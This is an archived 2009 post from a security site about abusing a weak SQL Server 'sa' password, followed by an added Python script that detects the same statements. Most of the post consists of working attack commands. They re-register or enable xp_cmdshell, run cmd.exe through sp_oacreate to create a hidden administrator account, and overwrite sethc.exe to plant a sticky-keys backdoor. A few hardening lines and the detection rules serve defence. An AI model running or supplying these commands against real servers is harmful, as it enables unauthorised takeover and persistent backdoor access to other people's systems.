1433 sa weak password related commands - Vulnerability warning - the black bar safety net

2009-08-04T00:00:00
ID MYHACK58:62200924147
Type myhack58
Reporter Anonymous
Modified 2009-08-04T00:00:00

Description

I. Changing the sa password: after connecting with the SQL integrated tool, run the command:

exec sp_password NULL,'newPassword','sa'

(Hint: use with caution!)

II. A simple patch for a weak sa password.

Method 1: connect with Query Analyzer and execute:

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO

Then press F5 to run the command.

Method 2: connect with Query Analyzer.

First step, execute:

use master

Second step, execute:

sp_dropextendedproc 'xp_cmdshell'

Then press F5 to run the command.

III. Restoring xp_cmdshell in common cases.

1. Could not find stored procedure 'master..xpcmdshell'.

Recovery method: connect with Query Analyzer and execute:

create procedure sp_addextendedproc --- 1996/08/30 20:13
    @functname nvarchar(517), /* (owner.)name of function to call */
    @dllname varchar(255) /* name of DLL containing function */
as
    set implicit_transactions off
    if @@trancount > 0
    begin
        raiserror(15002,-1,-1,'sp_addextendedproc')
        return (1)
    end
    dbcc addextendedproc( @functname, @dllname)
    return (0) -- sp_addextendedproc
GO

First step, execute:

EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'
declare @o int

Second step, execute:

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

Then press F5 to run the command.

2. Cannot load the DLL xpsql70.dll, or one of the DLLs it references. Reason: 126 (The specified module could not be found.)

Recovery method: connect with Query Analyzer.

First step, execute:

sp_dropextendedproc "xp_cmdshell"

Second step, execute:

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

Then press F5 to run the command.

3. Cannot find the function xp_cmdshell in the library xpweb70.dll. Reason: 127 (The specified procedure could not be found.)

Recovery method: connect with Query Analyzer.

First step, execute:

exec sp_dropextendedproc 'xp_cmdshell'

Second step, execute:

exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

Then press F5 to run the command.

IV. The ultimate method. If none of the methods above restores it, try adding an account directly in the following way. Connect with Query Analyzer.

2000 Server system:

declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user Web hacker /add'

declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators Web /add'

XP or 2003 Server system (error 126!), commands:

declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user Web$ hacker /add'

declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators Web$ /add'

V. C:\>DIR C:\

SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online.

Statement to execute in Query Analyzer:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Commands for the five-times-Shift backdoor:

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
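
The following Python is an added example, not part of the original post: it flags the statements from sections III to V and the sethc.exe copy in captured SQL text, while leaving the hardening commands from section II alone. The event format, the logins and the rule names are assumptions; how the SQL text is captured (trace or audit) is left to the environment.

```python
import re

# Signatures for the statements listed on this page, applied to SQL text
# captured by a trace or audit (the capture mechanism is an assumption).
RULES = [
    ("xp_cmdshell enabled via sp_configure",
     r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b"),
    ("xp_cmdshell re-registered",
     r"sp_addextendedproc\s+'?xp_cmdshell"),
    ("OLE automation object created",
     r"sp_oacreate\s+'(wscript\.shell|scripting\.filesystemobject)'"),
    ("account or group added from SQL",
     r"\bnet\s+(user|localgroup)\b[^']*/add"),
    ("sethc.exe overwritten",
     r"sethc\.exe"),
]
COMPILED = [(name, re.compile(rx, re.I)) for name, rx in RULES]


def scan(events):
    """Return (login, rule) pairs for every rule a captured statement trips."""
    hits = []
    for ev in events:
        # Collapse whitespace so line breaks inside a batch do not hide a match.
        sql = " ".join(ev["sql"].split())
        for name, rx in COMPILED:
            if rx.search(sql):
                hits.append((ev["login"], name))
    return hits


# Constructed sample events (logins are hypothetical).
SAMPLE = [
    {"login": "sa", "sql": "EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"},
    {"login": "dba1", "sql": "EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;"},
    {"login": "dba1", "sql": "use master\nexec sp_dropextendedproc 'xp_cmdshell'"},
    {"login": "sa", "sql": "exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'"},
    {"login": "sa", "sql": "declare @shell int exec sp_oacreate 'wscript.shell',"
        "@shell output exec sp_oamethod @shell,'run',null,"
        "'c:\\windows\\system32\\cmd.exe /c net user Web$ hacker /add'"},
    {"login": "app", "sql": "SELECT name FROM dbo.sysobjects WHERE xtype = 'U'"},
]

if __name__ == "__main__":
    for login, rule in scan(SAMPLE):
        print(f"ALERT login={login} rule={rule}")
```

Disabling xp_cmdshell (value 0) and sp_dropextendedproc do not alert, so routine hardening by an administrator stays out of the results.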
